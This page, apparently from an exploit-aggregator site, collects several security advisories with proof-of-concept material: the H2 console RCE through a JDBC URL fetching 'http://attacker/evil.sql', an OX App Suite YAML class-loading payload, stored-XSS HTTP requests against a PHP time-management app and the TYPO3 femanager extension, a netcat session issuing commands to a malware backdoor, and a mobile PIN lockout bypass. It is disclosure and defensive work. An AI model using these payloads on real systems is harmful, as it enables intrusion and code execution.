Latest exploits :: CodePwn

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/b83836d7e6b0893e08d88a7850ca84ee.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Agent.uq Vulnerability: Insecure Permissions Description: The malware writes a PE file with a ".sys" extension to c:\ drive, granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. Type: PE32 MD5: b83836d7e6b0893e08d88a7850ca84ee Vuln ID: MVID-2022-0464 Dropped files: MIGBOT.SYS Disclosure: 01/24/2022 Exploit/PoC: C:\>cacls MIGBOT.SYS C:\MIGBOT.SYS BUILTIN\Administrators:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Users:(ID)R NT AUTHORITY\Authenticated Users:(ID)C C:\>dir MIGBOT.SYS Volume in drive C has no label. Directory of C:\ 01/19/2022 06:27 PM 2,432 MIGBOT.SYS 1 File(s) 2,432 bytes 0 Dir(s) 27,604,955,136 bytes free C:\>type MIGBOT.SYS MZÉ @ !This program cannot be run in DOS mode. Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Product: OX App Suite, OX Documents Vendor: OX Software GmbH Internal reference: MWB-993 Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.5 and earlier Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.3-rev35, 7.10.4-rev25, 7.10.5-rev13 Vendor notification: 2021-03-09 Solution date: 2021-06-01 Public disclosure: 2021-11-18 CVE reference: CVE-2021-33489 CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) Vulnerability Details: Specific image formats use media-types that are were not recognized by our sanitization engine. When injecting HTML and JS code to such files, they could bypass sanitization methods. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to follow a hyperlink. Steps to reproduce: 1. Create a XCF image file and include JS code 2. Share the file using OX Drive sharing 3. Make someone click the direct link to the shared file Solution: We improved the list of known unsafe media-types to make sure such content is handled as binary file and download is enforced. --- Internal reference: MWB-1067 Vulnerability type: Code Injection (CWE-94) Vulnerable version: 7.10.5 and earlier Vulnerable component: middleware Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.3-rev35, 7.10.4-rev25, 7.10.5-rev13 Vendor notification: 2021-05-06 Solution date: 2021-06-01 Public disclosure: 2021-11-18 CVE reference: CVE-2021-33493 CVSS: 3.9 (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N) Vulnerability Details: The middleware component uses YAML for complex configuration constructs. The parser used for that purpose offers an insecure parsing method, which could be abused to inject arbitrary YAML-formatted Java classes that would be executed. Risk: Arbitrary Java code could be executed in the context of the middleware process. To exploit this, a user with high privilege or a compromised workload would have to maliciously modify configuration files. These modifications are very likely to cause malfunction and keep the service from starting properly. Steps to reproduce: 1. Add YAML representation of Java classes to a configuration file 2. Reload configuration or restart Proof of concept: !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://example.open-xchange.com/"] ]] ] Solution: We now use a parsing method that is limited to creating save Java classes which are expected for configuration files. --- Internal reference: MWB-1094 Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.5 and earlier Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.3-rev35, 7.10.4-rev25, 7.10.5-rev13 Vendor notification: 2021-05-20 Solution date: 2021-06-01 Public disclosure: 2021-11-18 CVE reference: CVE-2021-33490 CVSS: 3.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N) Vulnerability Details: HTML content stored as "snippet" does not get properly sanitized in case invalid HTML is stored. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would either have access to the victims account or be part of the same context. Steps to reproduce: 1. Create a snippet with broken HTML code and store it as (shared) mail signature 2. Make users to select the malicious mail signature Solution: We improved sanitization of snippets, including invalid HTML code. --- Internal reference: DOCS-3309 Vulnerability type: Relative Path Traversal (CWE-23) Vulnerable version: 7.10.5 and earlier Vulnerable component: office Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.3-rev15, 7.10.4-rev9, 7.10.5-rev6 Vendor notification: 2021-03-23 Solution date: 2021-06-01 Public disclosure: 2021-11-18 CVE reference: CVE-2021-33491 CVSS: 6.4 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:L) Vulnerability Details: External mail account discovery allows malicious users to append arbitrary URL paths to mail addresses. In combination with malicious auto-configuration DNS records, this can be abused to access web services outside of the expected trust boundary, regardless of existing blocklists. Risk: Zip archives (like OOXML and ODF documents) might contain entries with relative pathes, pointing outside of archive root. The extraction process uses the assigned paths and make it is possible to override OX service user writable files (e.g. log files) Steps to reproduce: 1. Create a OOXML or ODF file, modify the ZIP archive content table 2. Use a relative path that would overwrite or add files to unexpected locations 3. Use OX Documents to open such files Proof of concept: ../../../../../../../../../../../../../../../../../../../../tmp/foobar Solution: We now prevent the extraction of files with releative paths outside of the expected working directories. A WARN message has been added to the log file whenever this happens. --- Internal reference: OXUIB-770 Vulnerability type: Improper Input Validation (CWE-20) Vulnerable version: 7.10.5 Vulnerable component: frontend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.5-rev12 Vendor notification: 2021-03-17 Solution date: 2021-06-01 Public disclosure: 2021-11-18 CVE reference: CVE-2021-33488 CVSS: 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) Vulnerability Details: The "chat" component contains development related hooks to provide the URL of the chat backend service. This can be used to redirect users to rogue OX Chat servers. Risk: User may disclose sensitive information at a non-trusted system or get harassed with unsolicited content. To exploit this an attacker would require the victim to follow a hyperlink. Steps to reproduce: 1. Setup a rogue OX Chat backend or mock service 2. Create a hyperlink pointing to that service 3. Make users click that link Proof of concept: https://example.com/appsuite/#!!&app=io.ox/chat&chatHost=https://127.0.0.1:8000 Solution: We no longer accept user provided input as configuration for client components. --- Internal reference: OXUIB-771 Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.5 Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.5-rev12 Vendor notification: 2021-03-17 Solution date: 2021-06-01 Public disclosure: 2021-11-18 CVE reference: CVE-2021-33492 CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) Vulnerability Details: Room names in OX Chat can be set to JS code fragments, those are not sufficiently sanitized before adding them to other room participants DOM. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would need to be part of the OX context as the victim. Steps to reproduce: 1. Create a chat room with JS code as title 2. Invite other users Solution: We improved sanitization of room titles since they are user-provided information. --- Internal reference: OXUIB-809 Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.4 and earlier Vulnerable component: frontend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.3-rev30, 7.10.4-rev26 Vendor notification: 2021-04-16 Solution date: 2021-06-01 Public disclosure: 2021-11-18 CVE reference: To be assigned by the vulnerable component CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N) Vulnerability Details: OX App Suite uses the "blankshield" component to protect older browsers against "tabnabbing" attacks. A vulnerability was detected at this component, which could be used to run cross-site scripting attacks by injecting malicious hyperlinks to E-Mail and other content. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to follow a hyperlink. The issue is related to browsers which are no longer supported by OX App Suite 7.10.5 or newer. Steps to reproduce: 1. Create a E-Mail with a hyperlink that contains malicious JS code 2. Send that E-Mail to the victim and make it follow the link Solution: We provided a workaround for this issue to our code and to the upstream component. --- Internal reference: OXUIB-837 Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.5 Vulnerable component: frontend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.5-rev12 Vendor notification: 2021-05-06 Solution date: 2021-06-01 Public disclosure: 2021-11-18 CVE reference: CVE-2021-33494 CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) Vulnerability Details: A OX Chat method did not properly escape the room title when rendering the "typing" status and adding it to DOM. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would need to be part of the OX context as the victim. Steps to reproduce: 1. Create a OX Chat room with malicious code as title 2. Make users join and interact with this channel Solution: We now escape user input, like the room title, when injecting it to DOM. --- Internal reference: OXUIB-838 Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.5 Vulnerable component: frontend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.5-rev12 Vendor notification: 2021-05-06 Solution date: 2021-06-01 Public disclosure: 2021-11-18 CVE reference: CVE-2021-33495 CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) Vulnerability Details: A OX Chat method did not properly escape content of "system messages" when adding it to DOM. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would need to be part of the OX context as the victim. Steps to reproduce: 1. Create a system message in OX Chat that includes HTML/JS code 2. Make users join and interact with OX Chat Solution: We escape any chat messages, including system messages, when injecting it to DOM. </code></pre>

<pre><code># Exploit Title: Online Project Time Management System 1.0 - Multiple Stored XSS (Authenticated) # Date: 19/01/2022 # Exploit Author: Felipe Alcantara (Filiplain) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: Kali Linux # Description: Stored XSS in multiple fields... # Steps to reproduce (with employee Access) # Log in as an employee # Go to : http://localhost/ptms/?page=user # Add XSS payload to any field of the user's name. #Click Update ================= POST /ptms/classes/Users.php?f=save_employee HTTP/1.1 Host: localhost Content-Length: 1339 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvsLkAfaBC64Uzoak Origin: http://localhost Referer: http://localhost/ptms/?page=user Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm Connection: close ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="id" 4 ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="code" 2022-0003 ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="generated_password" ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="firstname" Mark ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="middlename" <script>alert("XSS_TEST")</script> ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="lastname" Cooper ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="gender" Male ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="department" IT Department ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="position" Department Manager ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="email" mcooper@sample.com ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="password" ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryvsLkAfaBC64Uzoak-- ================= ----------------------------------------------------------------------------- # Steps to reproduce (with Admin access) # Log in to the admin panel # Go to : http://localhost/ptms/admin/?page=system_info # Add XSS payload to the 'System Name' field #Click Update ================= POST /ptms/classes/SystemSettings.php?f=update_settings HTTP/1.1 Host: localhost Content-Length: 603 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCibB6pEzThjb4Zcq Origin: http://localhost Referer: http://localhost/ptms/admin/?page=system_info Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm Connection: close ------WebKitFormBoundaryCibB6pEzThjb4Zcq Content-Disposition: form-data; name="name" Online Project Time Management System - PHP <script>alert("XSS")</script> ------WebKitFormBoundaryCibB6pEzThjb4Zcq Content-Disposition: form-data; name="short_name" PTMS - PHP ------WebKitFormBoundaryCibB6pEzThjb4Zcq Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryCibB6pEzThjb4Zcq Content-Disposition: form-data; name="cover"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryCibB6pEzThjb4Zcq-- ================= </code></pre>

<pre><code>############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: Identity Vault # Vendor: Ionic # CSNC ID: CSNC-2021-020 # CVE ID: CVE-2021-44033 # Subject: PIN Unlock Lockout Bypass (Android & iOS) # Severity: Medium # Effect: Authentication Bypass # Author: Emanuel Duss <emanuel.duss@compass-security.com> # Date: 2021-11-19 # ############################################################# Introduction ------------ Ionic Identity Vault is a secure storage solution for Android and iOS mobile apps which can e.g. be used to store authentication information like access tokens [1]. This information can be protected, so that the user must authenticate first, before the information is unlocked. Identity Vault provides different authentication methods: - Memory only storage (not persisted at all) - Secure storage (without user authentication) - Passcode (PIN) authentication - Biometric authentication (optionally with device PIN fallback) The Passcode (PIN) authentication mechanism can be configured with a lockout counter, which will clear the secure storage after a specified number of failed unlocks. During a customer project, we could bypass the PIN unlock lockout mechanism. This allows an attacker with physical access to the device to brute force all possible unlock PIN combinations without being blocked. Affected -------- - Vulnerable: Ionic Identity Vault <= 5.0.4 - Not vulnerable: Ionic Identity Vault >= 5.0.5 Description ----------- The failed unlock counter is only stored in memory and can therefore be bypassed. An attacker with physical access to the phone is therefore able to brute force the PIN of the user without being blocked. For example, if the lockout threshold is set to 5, an attacker can perform 4 failed unlocks and close the app to clear the failed unlock counter. The app can then be opened again to get 4 more unlock attempts. This can be repeated until the correct PIN was found. Technical Description --------------------- # Vulnerability On Android, the logic of the lockout functionality is implemented in the `getData` method of the `com.ionicframework.IdentityVault.VaultBase` class. This method tracks the count of failed authentication attempts and clears the vault after the configured amount of possible failed unlocks is reached: public void getData() throws VaultError { try { if (this.data == null) { // [...] } } catch (AuthFailedError e) { lock(); int I = this.failedUnlockAttempts + 1; this.failedUnlockAttempts = I; if (I this.allowedInvalidUnlockAttempts) { clear(); this.failedUnlockAttempts = 0; throw new TooManyFailedAttemptsError(); } throw e; } catch (Exception e2) { throw new VaultError(e2.getLocalizedMessage()); } } This shows that the failed unlock count `failedUnlockAttempts` is not stored anywhere and only kept in memory. The code on iOS looks similar and therefore the same vulnerability applies to both Android and iOS. # Exploit The following steps can be performed to bypass the number of unlock attempts and get endless tries: - Open the app - Try several PIN unlock attempts until before the last possible attempt which would clear the secure storage - Close the app (this will clear the `failedUnlockAttempts`) - Start at step 1 again and try the next PINs. All these steps can be automated by using the Android Debug Bridge (adb) [2]. Vulnerability Classification ---------------------------- CVSS v3.1 Metrics [3]: - CVSS Base Score: 5.9 (Medium) - CVSS Vector: AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N Workaround / Fix ---------------- # Ionic Identity Vault Library Vendor A counter of the failed unlock attempts should be stored on the phone. This counter should only be readable by the app itself and not by other apps. It can e.g., be stored in the application directory. Note: An attacker with root access on the phone can always bypass such lockout mechanisms by hooking the functions which perform the check. A lockout counter stored in the application directory still protects against non-root attackers. It's therefore not necessary to specially protect/encrypt the failed unlock counter. # Ionic Identity Vault Library Users Customers of the Ionic Identity Vault should use the updated version Identity Vault 5.0.5 which fixes the issue [4]. Timeline -------- 2021-08-05: Vulnerability discovered 2021-09-06: Informed Ionic about the vulnerability 2021-09-07: Ionic told they will fix it and inform me when the fix is available 2021-10-25: Asked Ionic about the current state 2021-10-25: Ionic told it's already fixed. 2021-11-18: Requested CVE ID @ MITRE 2021-11-19: Assigned CVE-2021-44033 2021-11-19: Coordinated public disclosure References ---------- [1] https://ionic.io/docs/identity-vault [2] https://developer.android.com/studio/command-line/adb [3] https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N&version=3.1 [4] https://ionic.io/docs/identity-vault/changelog --> [5.0.5] (2021-09-30) </code></pre>

<pre><code>Document Title =============== Unauthenticated RCE vuln in the H2 Database console: CVE-2022-23221. Product Description =============== The H2 Console Application The Console lets you access a SQL database using a browser interface. Homepage: http://www.h2database.com/html/quickstart.html Affected Components =============== File Name: WebServer.java File Path: /h2database/h2/src/main/org/h2/server/web/WebServer.java Impacted Function: getConnection PoC =============== 1) Navigate to the console and attempt to connect to a H2 in memory database that does not exist using the following JDBC URL: ``` jdbc:h2:mem:1337; ``` 2) Note that you get the following security exception preventing you from creating a new in memory database: ``` Database "mem:1337" not found, either pre-create it or allow remote database creation (not recommended in secure environments) [90149-209] 90149/90149 (Help) ``` 3) Now try again with the following JDBC URL: ``` jdbc:h2:mem:1339;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;'\ ``` 4) Note that you were able to successfully create a new in memory database 5) Create a SQL file that contains a trigger that executes java/javascript/ruby code when executed and host it on a domain you control (ex: http://attacker) 6) Use the following JDBC URL to execute the SQL file hosted on your domain on connect: ``` jdbc:h2:mem:1337;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT FROM 'http://attacker/evil.sql';'\ ``` Example evil.sql file: ``` CREATE TABLE test ( id INT NOT NULL ); CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS '//javascript var fos = Java.type("java.io.FileOutputStream"); var b = new fos ("/tmp/pwnedlolol");'; INSERT INTO TEST VALUES (1); ``` CVE Issued: CVE-2022-23221 </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220117-0 > ======================================================================= title: Stored Cross-Site Scripting vulnerability product: TYPO3 extension "femanager" vulnerable version: 6.0.0 - 6.3.0 and 5.5.0 and below fixed version: 6.3.1 and 5.5.1 CVE number: CVE-2021-36787 impact: Medium homepage: https://www.in2code.de https://extensions.typo3.org/extension/femanager found: 2021-06-01 by: Lukas Eder (Atos Germany) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Femanager is an extension for a TYPO3 Frontend-User Registration. Maybe you know sr_feuser_register but you want to use a more modern extension, give femanager a try. This extension basicly brings an easy-to-use frontend-user-registration with a profile manager to your system. In addition femanager was developed to be very flexible and to bring a lot of features out of the box." Source: https://docs.typo3.org/p/in2code/femanager/master/en-us/Introduction/Index.html Business recommendation: ------------------------ The vendor provides a patched version which should be installed immediately. Vulnerability overview/description: ----------------------------------- 1) Stored Cross-Site Scripting (CVE-2021-36787) The default configuration of the upload function within the registration workflow of the femanager to create new frontend users allows an upload of various file types as profile image. An attacker can use the upload function in the registration process to upload SVG files with embedded JavaScript code that is stored on the webserver. Depending on the developed application, the malicious JavaScript code is executed in the context of other users in various scenarios, e.g. when a user visits the profile of the attacker's frontend user. Proof of concept: ----------------- 1) Stored Cross-Site Scripting (CVE-2021-36787) The vulnerability can be triggered if the extension's image upload function is used. The following proof of concept shows the crafted HTTP Request that was used to create a user with embedded JavaScript code in the SVG file. This SVG file is used as profile image, which leads to execution every time the image is rendered. HTTP Request: ------------------------------------------------------------------------------- POST /login/registrieren?tx_femanager_pi1%5Baction%5D=create&tx_femanager_pi1%5Bcontroller%5D=New&cHash=XXX HTTP/1.1 Host: <IP> Content-Type: multipart/form-data; boundary=---------------------------222617292530868691744105633415 Connection: close -----------------------------222617292530868691744105633415 Content-Disposition: form-data; name="tx_femanager_pi1[__referrer][@extension]" Femanager -----------------------------222617292530868691744105633415 Content-Disposition: form-data; name="tx_femanager_pi1[__referrer][@vendor]" In2code [...] -----------------------------222617292530868691744105633415 Content-Disposition: form-data; name="tx_femanager_pi1[user][username]" XXX -----------------------------222617292530868691744105633415 Content-Disposition: form-data; name="tx_femanager_pi1[user][password]" XXX -----------------------------222617292530868691744105633415 Content-Disposition: form-data; name="tx_femanager_pi1[password_repeat]" XXX [...] -----------------------------222617292530868691744105633415 Content-Disposition: form-data; name="tx_femanager_pi1[user][image][0]"; filename="xss_file.svg" Content-Type: image/svg+xml <svg xmlns="http://www.w3.org/2000/svg"> <script>alert("XSS WORKS")</script> </svg> -----------------------------222617292530868691744105633415 ------------------------------------------------------------------------------- Tested versions: ----------------------------- The following version has been tested: * femanager: 5.4.2 (TYPO3: 9.5.27) The vendor confirmed that the following versions are also affected by the vulnerability: * femanager: 6.0.0 - 6.3.0 and 5.5.0 and below Vendor contact timeline: ------------------------ 2021-07-05: Contacting vendor through security@typo3.org. 2021-07-06: Received information from vendor that they will work on a solution. 2021-08-10: Received info from vendor about a released Typo3 Security Advisory that covers the vulnerability. The advisory also covers the updated versions of the extensions that should be used. 2022-01-17: Release of security advisory. Solution: --------- The vendor provides a patched version which should be installed immediately. Further information can be found at the Typo3 security advisory: https://typo3.org/security/advisory/typo3-ext-sa-2021-010 Workaround: ----------- The upload of SVG files could be disabled. This can be accomplished by adjusting the configuration file of the femanager extension. If SVG files are necessary for the functions of the website, it must be ensured that malicious code within these files, e.g. in the form of JavaScript, is not executed. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Lukas Eder / @2022 </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/290477c9707f64a316888493ae67b1ef.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Antilam.11 Vulnerability: Unauthenticated Remote Command Execution Description: The malware listens on TCP ports 29559, 47891. Third party attackers who can reach infected systems can execute commands made available by the backdoor. Netcat utility worked the best for running commands, which are supplied as numeric values or hex characters. The values sent correspond to different commands mapped in the backdoor. Commands are typically three digits e.g. 001 and perform various actions on the infected host. Type: PE32 MD5: 290477c9707f64a316888493ae67b1ef Vuln ID: MVID-2021-0403 Dropped files: scandisk.exe Disclosure: 11/21/2021 Exploit/PoC: nc64.exe x.x.x.x 47891 001 001 Windows: C:\WINDOWS System: C:\WINDOWS\system32 Temp: C:\Users\Victim\AppData\Local\Temp\ Windows: Windows NT 6.2 9200 Windows: 02 : DESKTOP-2C3IQHO α: Victim Windows: English (United States) ╨ατ≡: 1547x787 NumLock: Off CapsLock: Off ScrollLock: Off ╤ΓεßεΣφεσ ∞σ±≥ε φα ΣΦ±Ωσ: 3,722,629,120 DESKTOP-2C3IQHO 000Taskbar ±Ω≡√δ± ...005 000╚ΩεφΩΦ ±Ω≡√ⁿ...006 000╫α±√ⁿ...007 000Monitor ..008 000Ctrl+Alt+Del ...009 000ScrollLock ...010 000CapsLock ..011 000NumLock Γφ...012 000CD-ROM ταΩ≡√≥...013 000═σ ∞επ≤ ≤±≥αφεΓΦ≥ⁿ Γ≡σ∞ ...014 000═σ ∞επ≤ ≤±≥αφεΓΦ≥ⁿ Σα≥≤...015 01508:56 PM|11/17/2021016 000Mouse was been unlocked...019 020500021 021022 66022023Shell Experience Host3IQHO\Victim]+ (Administrator) Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>